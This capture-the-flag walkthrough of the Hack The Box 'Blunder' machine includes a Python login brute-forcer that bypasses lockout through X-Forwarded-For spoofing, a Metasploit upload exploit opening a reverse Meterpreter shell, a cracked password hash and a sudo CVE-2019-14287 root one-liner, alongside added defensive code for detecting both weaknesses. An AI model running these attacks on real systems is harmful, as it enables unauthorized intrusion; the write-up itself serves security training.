Recon to foothold
Start with an nmap scan:
kali@kali:~/Documents/HackTheBox/Blunder$ nmap -A -T4 -p- -v 10.10.10.191
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-13 16:20 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:20
Completed NSE at 16:20, 0.00s elapsed
Initiating NSE at 16:20
Completed NSE at 16:20, 0.00s elapsed
Initiating NSE at 16:20
Completed NSE at 16:20, 0.00s elapsed
Initiating Ping Scan at 16:20
Scanning 10.10.10.191 [2 ports]
Completed Ping Scan at 16:20, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:20
Completed Parallel DNS resolution of 1 host. at 16:20, 0.03s elapsed
Initiating Connect Scan at 16:20
Scanning 10.10.10.191 [65535 ports]
Discovered open port 80/tcp on 10.10.10.191
Connect Scan Timing: About 22.31% done; ETC: 16:23 (0:01:48 remaining)
Connect Scan Timing: About 56.28% done; ETC: 16:22 (0:00:47 remaining)
Completed Connect Scan at 16:22, 91.84s elapsed (65535 total ports)
Initiating Service scan at 16:22
Scanning 1 service on 10.10.10.191
Completed Service scan at 16:22, 6.06s elapsed (1 service on 1 host)
NSE: Script scanning 10.10.10.191.
Initiating NSE at 16:22
Completed NSE at 16:22, 2.15s elapsed
Initiating NSE at 16:22
Completed NSE at 16:22, 0.09s elapsed
Initiating NSE at 16:22
Completed NSE at 16:22, 0.00s elapsed
Nmap scan report for 10.10.10.191
Host is up (0.025s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
NSE: Script Post-scanning.
Initiating NSE at 16:22
Completed NSE at 16:22, 0.00s elapsed
Initiating NSE at 16:22
Completed NSE at 16:22, 0.00s elapsed
Initiating NSE at 16:22
Completed NSE at 16:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.54 seconds
Interesting, the box has a closed FTP port, not sure what we can do with that! (Nothing is the answer.)
The box has a website on port 80.
None of the immediately accessible pages have comments or anything exciting hidden in the source. There is a robots.txt but it's pretty much empty.
Let's run dirbuster to see if we can find some interesting subdirectories, and perhaps nikto for vulnerabilities too.
Nikto finds nothing much of interest, only a config.php file that we can't read.
kali@kali:~/Documents/HackTheBox/Blunder$ nikto -h http://10.10.10.191:80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.191
+ Target Hostname: 10.10.10.191
+ Target Port: 80
+ Start Time: 2020-06-13 16:29:51 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: Bludit
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /admin/config.php: PHP Config file may contain database IDs and passwords.
Meanwhile dirbuster pretty quickly returns an admin folder.
A quick Google search for this reveals that the site runs the Bludit CMS: https://docs.bludit.com/en/
The documentation talks about an API, but /api/users is not found unfortunately.
There is another interesting/alarming entry in the manual concerning "Brute Force Protection". This might cause us problems if we have to try and guess our way in later:
What is a Brute Force Attack? This kind of attack consists of an attacker trying many passwords or passphrases with the hope of eventually guessing correctly -Wiki. How does this work? Bludit provides brute force protection to mitigate this kind of attack, and this protection is enabled by default. For each failure to log in, Bludit adds the IP of the user who failed to authenticate to a blacklist. When the user fails for a number of times, Bludit blocks the offending IP for a period of time, and the user can't log in until the block has expired.
A quick check in searchsploit shows us a couple of potential exploits available, but reading the details on the first (and most useful) it seems we need login credentials.
kali@kali:~$ searchsploit bludit
--------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------- ---------------------------------
Bludit - Directory Traversal Image File Upload (Metasploit) | php/remote/47699.rb
bludit Pages Editor 3.0.0 - Arbitrary File Upload | php/webapps/46060.txt
--------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
Meanwhile dirbuster has also found a /todo.txt file.
Ok, at the least here we may have a possible username, fergus, so let's think about bruteforcing the password. Perhaps a wordlist based on the webpage might be a good start. We'll use cewl for this.
kali@kali:~/Documents/HackTheBox/Blunder$ cewl -w wordlist.txt -d 10 -m 3 http://10.10.10.191/
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Unfortunately we have seen that there is a default-activated brute-forcing protection, so let's have a google to see if we can find a mitigation for this.
Aha! A Google search for "bludit brute force mitigation bypass" finds us this page; let's see if we can utilise this method to attack the login. It turns out that the CMS uses the "X-Forwarded-For" header to decide which IP address to potentially block, so with a script that changes the value of this header on every attempt we can bypass the protection (the proof of concept below simply reuses each candidate password as the header value).
From that source we get a proof of concept which we modify as follows. (NB: we had to make an additional edit here to remove the "\n" newlines from each word.)
#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'

# Load the cewl output, stripping the trailing newline from every word
wordlist = []
with open("wordlist.txt") as file:
    wordlist = [line.rstrip() for line in file]

for password in wordlist:
    # Fresh session per attempt: fetch the login page to obtain the CSRF token
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
    print('[*] Trying: {p}'.format(p = password))
    headers = {
        # The candidate password doubles as the spoofed client address, so every
        # failed attempt is counted against a different "IP" and never blocked
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }
    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }
    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
    # A successful login answers with a redirect to the dashboard
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
When we run this we get the following:
kali@kali:~/Documents/HackTheBox/Blunder$ vi brute.py
kali@kali:~/Documents/HackTheBox/Blunder$ python brute.py
[*] Trying: the
[*] Trying: Load
[*] Trying: Plugins
--snip--
[*] Trying: fictional
[*] Trying: character
[*] Trying: RolandDeschain
()
SUCCESS: Password found!
Use fergus:RolandDeschain to login.
()
Excellent, we have found creds: fergus:RolandDeschain
With our found creds we can use the first of the previously found exploits to pop a shell using Metasploit.
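The bypass above works because the application keys its blacklist on a header the client controls. As an added defensive illustration (not code from the original post or from Bludit), this Python snippet shows a login limiter with the naive client-IP lookup beside a hardened one that only honours X-Forwarded-For when the request really comes from a trusted reverse proxy; the proxy address and the replayed requests are constructed values.

```python
import ipaddress
from collections import defaultdict

# Assumption (constructed): the only reverse proxy sitting in front of the CMS.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.5/32")]
MAX_FAILURES = 5

def _is_trusted(addr):
    return any(addr in net for net in TRUSTED_PROXIES)

def client_ip_naive(peer_ip, headers):
    """Vulnerable: whoever sends the request also chooses its 'IP'."""
    return headers.get("X-Forwarded-For", peer_ip)

def client_ip_hardened(peer_ip, headers):
    """Honour X-Forwarded-For only when the TCP peer is a trusted proxy, and
    then use the rightmost hop that is not itself a trusted proxy."""
    if not _is_trusted(ipaddress.ip_address(peer_ip)):
        return peer_ip
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",")]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            continue  # junk such as a password is not an address
        if not _is_trusted(addr):
            return str(addr)
    return peer_ip

class LoginLimiter:
    """Per-IP failure counter, keyed on whatever the resolver returns."""
    def __init__(self, resolver):
        self.resolver = resolver
        self.failures = defaultdict(int)

    def attempt(self, peer_ip, headers, password, real_password):
        key = self.resolver(peer_ip, headers)
        if self.failures[key] >= MAX_FAILURES:
            return "blocked"
        if password == real_password:
            self.failures[key] = 0
            return "ok"
        self.failures[key] += 1
        return "denied"

def simulate(resolver, guesses=20):
    """Replay the PoC's trick (constructed input): every guess comes from the
    same peer but carries the candidate password as X-Forwarded-For."""
    limiter = LoginLimiter(resolver)
    outcomes = []
    for i in range(guesses):
        guess = f"candidate{i}"
        outcomes.append(limiter.attempt("192.0.2.10", {"X-Forwarded-For": guess}, guess, "correct-horse"))
    return outcomes
```

With the naive resolver all twenty guesses are merely "denied", while the hardened resolver blocks the peer after the fifth failure.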
kali@kali:~$ msfconsole
.;lxO0KXXXK0Oxl:.
,o0WMMMMMMMMMMMMMMMMMMKd,
'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
:KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
.KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo
xMMMMMMMMMMWd. .oNMMMMMMMMMMk
oMMMMMMMMMMx. dMMMMMMMMMMx
.WMMMMMMMMM: :MMMMMMMMMM,
xMMMMMMMMMo lMMMMMMMMMO
NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW. ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd ,0MMMMMMMMMMK;
.WMMMMMMMMMc 'OMMMMMM0,
lMMMMMMMMMMk. .kMMO'
dMMMMMMMMMMWd' ..
cWMMMMMMMMMMMNxc'. ##########
.0MMMMMMMMMMMMMMMMWc #+# #+#
;0MMMMMMMMMMMMMMMo. +:+
.dNMMMMMMMMMMMMo +#++:++#+
'oOWMMMMMMMMo +:+
.,cdkO0K; :+: :+:
:::::::+:
Metasploit
=[ metasploit v5.0.92-dev ]
+ -- --=[ 2026 exploits - 1102 auxiliary - 343 post ]
+ -- --=[ 566 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Metasploit can be configured at startup, see msfconsole --help to learn more
msf5 > search bludit
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/bludit_upload_images_exec 2019-09-07 excellent Yes Bludit Directory Traversal Image File Upload Vulnerability
msf5 > use 0
msf5 exploit(linux/http/bludit_upload_images_exec) > options
Module options (exploit/linux/http/bludit_upload_images_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
BLUDITPASS yes The password for Bludit
BLUDITUSER yes The username for Bludit
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path for Bludit
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Bludit v3.9.2
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
BLUDITPASS => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
BLUDITUSER => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set RHOSTS 10.10.10.191
RHOSTS => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set LHOST tun0
LHOST => tun0
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.35:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading YqhKAOOBkR.png...
[*] Uploading .htaccess...
[*] Executing YqhKAOOBkR.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.14.35:4444 -> 10.10.10.191:39576) at 2020-06-13 17:03:44 -0400
[+] Deleted .htaccess
meterpreter > dir
Listing: /var/www/bludit-3.9.2/bl-content/tmp
=============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2020-06-13 17:04:29 -0400 thumbnails
meterpreter > getuid
Server username: www-data (33)
And we're in.
Looking around it seems that hugo is our first target, and then potentially from there to shaun and on to root (as shaun has sudo rights by the look of it), or potentially directly to root depending on what we find as hugo.
meterpreter > cd /home
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2020-05-26 04:29:29 -0400 hugo
40755/rwxr-xr-x 4096 dir 2020-04-28 07:13:35 -0400 shaun
meterpreter > cd hugo
meterpreter > ls -la
Listing: /home/hugo
===================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
20666/rw-rw-rw- 0 cha 2020-06-13 09:19:18 -0400 .bash_history
100644/rw-r--r-- 220 fil 2019-11-28 04:59:55 -0500 .bash_logout
100644/rw-r--r-- 3771 fil 2019-11-28 04:59:55 -0500 .bashrc
40700/rwx------ 4096 dir 2020-04-27 09:29:47 -0400 .cache
40700/rwx------ 4096 dir 2019-11-28 06:37:37 -0500 .config
40700/rwx------ 4096 dir 2020-04-27 09:30:11 -0400 .gnupg
40775/rwxrwxr-x 4096 dir 2019-11-28 05:03:01 -0500 .local
40700/rwx------ 4096 dir 2020-04-27 09:29:46 -0400 .mozilla
100644/rw-r--r-- 807 fil 2019-11-28 04:59:55 -0500 .profile
40700/rwx------ 4096 dir 2020-04-27 09:30:11 -0400 .ssh
40755/rwxr-xr-x 4096 dir 2019-11-28 06:36:30 -0500 Desktop
40755/rwxr-xr-x 4096 dir 2019-11-28 06:36:30 -0500 Documents
40755/rwxr-xr-x 4096 dir 2019-11-28 06:36:30 -0500 Downloads
40755/rwxr-xr-x 4096 dir 2019-11-28 06:36:30 -0500 Music
40755/rwxr-xr-x 4096 dir 2019-11-28 06:36:30 -0500 Pictures
40755/rwxr-xr-x 4096 dir 2019-11-28 06:36:30 -0500 Public
40755/rwxr-xr-x 4096 dir 2019-11-28 06:36:30 -0500 Templates
40755/rwxr-xr-x 4096 dir 2019-11-28 06:36:30 -0500 Videos
100400/r-------- 33 fil 2020-06-13 09:21:41 -0400 user.txt
meterpreter > cat user.txt
[-] core_channel_open: Operation failed: 1
meterpreter > cd ../shaun
meterpreter > ls
Listing: /home/shaun
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
20666/rw-rw-rw- 0 cha 2020-06-13 09:19:18 -0400 .bash_history
40755/rwxr-xr-x 4096 dir 2019-11-28 08:17:29 -0500 .cache
40755/rwxr-xr-x 4096 dir 2019-11-28 06:13:00 -0500 .config
40700/rwx------ 4096 dir 2019-11-28 08:17:22 -0500 .gnupg
40755/rwxr-xr-x 4096 dir 2019-11-28 04:56:08 -0500 .local
40755/rwxr-xr-x 4096 dir 2019-11-28 06:16:07 -0500 .mozilla
40700/rwx------ 4096 dir 2019-11-28 08:17:22 -0500 .ssh
100644/rw-r--r-- 0 fil 2019-11-28 04:59:45 -0500 .sudo_as_admin_successful
40755/rwxr-xr-x 4096 dir 2019-11-28 06:11:32 -0500 Desktop
40755/rwxr-xr-x 4096 dir 2020-05-19 10:14:38 -0400 Documents
40755/rwxr-xr-x 4096 dir 2019-11-28 06:11:32 -0500 Downloads
40755/rwxr-xr-x 4096 dir 2019-11-28 06:11:32 -0500 Music
40755/rwxr-xr-x 4096 dir 2019-11-28 09:02:17 -0500 Pictures
40755/rwxr-xr-x 4096 dir 2019-11-28 06:11:32 -0500 Public
40755/rwxr-xr-x 4096 dir 2019-11-28 06:11:32 -0500 Templates
40755/rwxr-xr-x 4096 dir 2019-11-28 06:11:32 -0500 Videos
Horizontal privesc to user
Running linpeas we find a couple of interesting details. Firstly, a useful bit of info for later perhaps: /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485), which could give us root once we have sudo rights (which we know that shaun does).
Linpeas also identifies the presence of an ftp directory in the root, so let's look in there.
cd /ftp
ls
D5100_EN.pdf
config
config.json
note.txt
cat note.txt
Hey Sophie
I've left the thing you're looking for in here for you to continue my work
when I leave. The other thing is the same although Ive left it elsewhere too.
Its using the method we talked about; dont leave it on a post-it note this time!
Thanks
Shaun
Let's download all the files and have a closer look at them.
D5100_EN.pdf appears to be a standard PDF file, the Nikon D5100 Digital Camera User's Manual.
config appears to be a binary file, function unknown for now. It's not executable despite being seemingly binary encoded.
config.json has superhero data:
kali@kali:~/Documents/HackTheBox/Blunder$ cat config.json
{
"squadName": "Super hero squad",
"homeTown": "Metro City",
"formed": 2016,
"secretBase": "Super tower",
"active": true,
"members": [
{
"name": "Molecule Man",
"age": 29,
"secretIdentity": "Dan Jukes",
"powers": [
"Radiation resistance",
"Turning tiny",
"Radiation blast"
]
},
{
"name": "Madame Uppercut",
"age": 39,
"secretIdentity": "Jane Wilson",
"powers": [
"Million tonne punch",
"Damage resistance",
"Superhuman reflexes"
]
},
{
"name": "Eternal Flame",
"age": 1000000,
"secretIdentity": "Unknown",
"powers": [
"Immortality",
"Heat Immunity",
"Inferno",
"Teleportation",
"Interdimensional travel"
]
}
]
}
Going back to the Bludit docs for a moment we find that the content is stored in a flat-file database, with the user creds in a file called bl-content/databases/users.php.
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Admin",
"firstName": "Administrator",
"lastName": "",
"role": "admin",
"password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
"salt": "5dde2887e7aca",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""
},
"fergus": {
"firstName": "",
"lastName": "",
"nickname": "",
"description": "",
"role": "author",
"password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
"salt": "jqxpjfnv",
"email": "",
"registered": "2019-11-27 13:26:44",
"tokenRemember": "",
"tokenAuth": "0e8011811356c0c5bd2211cba8c50471",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"codepen": "",
"instagram": "",
"github": "",
"gitlab": "",
"linkedin": "",
"mastodon": ""
}
}
This gives us an admin user password hash to try and crack.
Ah, but there is a second, non-active version of Bludit installed too, in /var/www/bludit-3.10.0a. How about the users defined there?
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
Ok, let's focus on hugo as planned for a moment. Popping his password hash into crackstation.net gives us Password120.
So we have some creds for hugo! Let's connect with them: hugo:Password120
$ su - hugo
Password: Password120
hugo@blunder:~$ id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
This also means we can pick up the user flag!
hugo@blunder:~$ cat user.txt
`REDACTED`
We got it! The user flag: REDACTED
Privesc to root
Let's check what sudo rights hugo has.
hugo@blunder:~$ sudo -l
Password: Password120
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
Hmm, what version of sudo are we running? Could it be susceptible to CVE-2019-14287? From linpeas:
[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.25p1
Seems like it might be! Let's try it.
hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo# cat /root/root.txt
cat /root/root.txt
`REDACTED`
Yes, WIN! The root flag: REDACTED
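The combination that made this work is a runas spec of (ALL, !root) on a sudo older than 1.8.28, the release that fixed CVE-2019-14287; the remediation is to upgrade sudo and, until then, to avoid rules that grant ALL and merely exclude root. As an added example (not part of the original writeup), this Python check parses sudo -l output plus a version string and lists the commands exposed, using the text from this box as its embedded sample input:

```python
import re

# CVE-2019-14287 was fixed upstream in sudo 1.8.28.
FIXED_IN = (1, 8, 28, 0)

def parse_sudo_version(text):
    """Turn 'Sudo version 1.8.25p1' into (1, 8, 25, 1); None if absent."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        return None
    return tuple(int(x or 0) for x in m.groups())

def rules_from_sudo_l(text):
    """Return (runas_spec, command) pairs listed after the
    'may run the following commands' line of `sudo -l` output."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if in_rules:
            # optional tags such as NOPASSWD: sit between the runas spec and the command
            m = re.match(r"\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+)", line)
            if m:
                rules.append((m.group(1), m.group(3).strip()))
    return rules

def runas_excludes_only_root(runas):
    """True for specs like 'ALL, !root' or 'ALL, !#0' (any user except root).
    A plain '(ALL)' already grants root outright and is not this bug."""
    users = runas.split(":")[0]  # drop the optional group list
    entries = [e.strip() for e in users.split(",")]
    return "ALL" in entries and any(e in ("!root", "!#0") for e in entries)

def cve_2019_14287_exposed(sudo_l_text, version_text):
    """Commands a user could run as uid 0 via `-u#-1` on an unpatched sudo."""
    version = parse_sudo_version(version_text)
    if version is None or version >= FIXED_IN:
        return []
    return [cmd for runas, cmd in rules_from_sudo_l(sudo_l_text)
            if runas_excludes_only_root(runas)]

# Sample input copied from this box's `sudo -l` output and linpeas line.
SUDO_L = r"""Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
"""
LINPEAS = "Sudo version 1.8.25p1"
```

Running cve_2019_14287_exposed(SUDO_L, LINPEAS) returns ['/bin/bash']; the same rule on sudo 1.8.28 or later returns nothing.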